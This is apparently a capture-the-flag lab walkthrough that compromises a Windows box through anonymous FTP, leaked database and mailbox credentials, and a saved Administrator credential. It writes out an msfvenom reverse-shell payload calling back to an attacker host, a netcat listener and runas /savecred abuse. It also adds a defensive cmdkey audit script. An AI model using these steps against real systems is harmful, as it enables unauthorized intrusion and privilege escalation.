- The first step is to scan all the ports and then enumerate the versions and technologies running on the open ones.
nmap -p- --open -vvv --min-rate 3000 -Pn -sS 10.10.10.98 -oG scan
/opt/extractports scan
nmap -p21,23,80 -Pn -sCV 10.10.10.98 -oN ports
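The `/opt/extractports` helper used above is a personal script that is not shown on the page; as an added example (not that script, and not part of the original write-up), here is a small Python equivalent that parses nmap's grepable (`-oG`) output and produces the comma-separated port list fed to the second scan. The scan text in `SAMPLE_GREPABLE` is constructed for the example.

```python
"""Parse nmap grepable (-oG) output and extract the open ports per host.

Added example standing in for the /opt/extractports helper; the sample
scan output below is constructed, not real scan data.
"""
import sys

# Constructed sample of nmap -oG output: three open ports and one filtered one.
SAMPLE_GREPABLE = """# Nmap 7.94 scan initiated as: nmap -p- --open -sS -oG scan 10.10.10.98
Host: 10.10.10.98 ()\tStatus: Up
Host: 10.10.10.98 ()\tPorts: 21/open/tcp//ftp///, 23/open/tcp//telnet///, 80/open/tcp//http///, 445/filtered/tcp//microsoft-ds///\tIgnored State: filtered (65531)
# Nmap done -- 1 IP address (1 host up) scanned in 30.12 seconds
"""

# Each port entry is "port/state/proto/owner/service/rpcinfo/version/" (trailing slash).
PORT_FIELDS = ("port", "state", "proto", "owner", "service", "rpc", "version")


def parse_grepable(text):
    """Return {host: [port records]} for every 'Ports:' line in the output."""
    results = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue  # comment lines and anything else
        # Tab-separated "Key: value" fields on each Host line.
        fields = dict(f.split(": ", 1) for f in line.split("\t") if ": " in f)
        host = fields["Host"].split()[0]  # "10.10.10.98 ()" -> "10.10.10.98"
        ports_field = fields.get("Ports")
        if not ports_field:
            continue  # e.g. the "Status: Up" line carries no ports
        # Entries are ", "-separated; assumes no ", " inside a version string.
        for entry in ports_field.split(", "):
            parts = entry.split("/")
            parts += [""] * (len(PORT_FIELDS) - len(parts))  # pad short entries
            rec = dict(zip(PORT_FIELDS, parts))
            rec["port"] = int(rec["port"])
            results.setdefault(host, []).append(rec)
    return results


def open_ports(results, host):
    """Sorted list of port numbers in state 'open' for one host."""
    return sorted(r["port"] for r in results.get(host, []) if r["state"] == "open")


def nmap_port_spec(results, host):
    """Comma-joined open ports, ready for 'nmap -p', e.g. '21,23,80'."""
    return ",".join(str(p) for p in open_ports(results, host))


if __name__ == "__main__":
    # Usage: python extractports.py scan   (falls back to the constructed sample)
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_GREPABLE
    parsed = parse_grepable(text)
    for host in parsed:
        print(f"{host}: {nmap_port_spec(parsed, host)}")
```

Running it on the file written by `-oG scan` prints one line per host with the open ports, which is exactly the value passed to `-p` in the follow-up `-sCV` scan.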

- From the initial reconnaissance I see that port 21 allows logging in with anonymous credentials.
- I find two directories, each containing a file. I switch to binary mode and download both (the second filename contains a space, so it has to be quoted).

binary
get Backups/backup.mdb
get "Engineer/Access Control.zip"
- I start by viewing the database schema, query the tables and decide to view the contents of the auth_user table. In it I find three entries with potential credentials.
mdb-tables backup.mdb
mdb-schema backup.mdb
mdb-sql backup.mdb
select id,username,password from auth_user;

- When I try the engineer credential via telnet on port 23 I get a different error message than with the other credentials.

- When unzipping the archive it asks me for a password. I try the credentials found and the engineer one is correct, so I manage to extract it.
- An Access Control.pst file is extracted. A PST (Personal Storage Table) file is the format Outlook uses to store e-mail messages, contacts and other items.
- To read the contents of the file I use readpst, which converts it into a file whose content I can then inspect.

- When reading the e-mail I find credentials for the security user. I use them to connect via telnet on port 23, get access to the system and read the first flag.


- To escalate privileges I start listing files in the usual directories and find a shortcut (link) on the Public desktop.
- When viewing its contents I see that the system has stored the Administrator user's credentials, which the shortcut uses via runas /savecred.


- I set up an SMB share to transfer files between my machine and the victim machine.
sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test
net use n: \\10.10.14.10\share /user:test test
- I generate a binary that opens a reverse shell. I run it with the stored credentials, get a shell as Administrator and can read the second flag.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.10 LPORT=1234 -f exe > pepe.exe
nc -nlvp 1234
runas /user:ACCESS\Administrator /savecred "C:\temp\pepe.exe"
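The escalation above works only because Windows kept the Administrator password in Credential Manager for use with `runas /savecred`. From the defender's side, the stored entries can be reviewed with `cmdkey /list`; as an added example (not part of the write-up), the script below parses that output and flags saved domain passwords for privileged accounts. The format of the blocks follows the usual `cmdkey /list` layout and the sample text is constructed, not captured from the machine.

```python
"""Audit `cmdkey /list` output for saved passwords of privileged accounts.

Added example, not part of the original write-up. The sample output is
constructed in the usual cmdkey layout (Target / Type / User blocks).
"""

# Constructed sample: one saved interactive logon for Administrator and one
# unrelated generic credential.
SAMPLE_CMDKEY_OUTPUT = """
Currently stored credentials:

    Target: Domain:interactive=ACCESS\\Administrator
    Type: Domain Password
    User: ACCESS\\Administrator

    Target: LegacyGeneric:target=printer-portal
    Type: Generic
    User: svc_print
    Saved for this logon only
"""

# Account names (case-insensitive, without the DOMAIN\\ prefix) that should
# never have a saved password on a workstation or shared host.
PRIVILEGED_ACCOUNTS = {"administrator"}


def parse_cmdkey_list(text):
    """Split `cmdkey /list` output into one dict per stored credential."""
    entries = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("Target:"):
            current = {}            # every credential block starts with Target:
            entries.append(current)
        if current is None:
            continue                # header text before the first block
        if ": " in line:
            key, value = line.split(": ", 1)
            current[key] = value
        elif line:
            # Trailing lines without a colon, e.g. "Saved for this logon only".
            current.setdefault("Notes", []).append(line)
    return entries


def privileged_saved_credentials(entries, privileged=PRIVILEGED_ACCOUNTS):
    """Return the User values of saved domain passwords for privileged accounts."""
    flagged = []
    for entry in entries:
        user = entry.get("User", "")
        account = user.rsplit("\\", 1)[-1].lower()   # strip "DOMAIN\\"
        if entry.get("Type") == "Domain Password" and account in privileged:
            flagged.append(user)
    return flagged


if __name__ == "__main__":
    # On a Windows host: cmdkey /list > creds.txt, then feed that file here.
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_CMDKEY_OUTPUT
    for user in privileged_saved_credentials(parse_cmdkey_list(text)):
        print(f"saved password for privileged account: {user}")
```

Any account reported here should have its saved entry removed (`cmdkey /delete:<target>`) and the shortcut changed so it no longer relies on `/savecred`; the finding is also a prompt to rotate that account's password.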
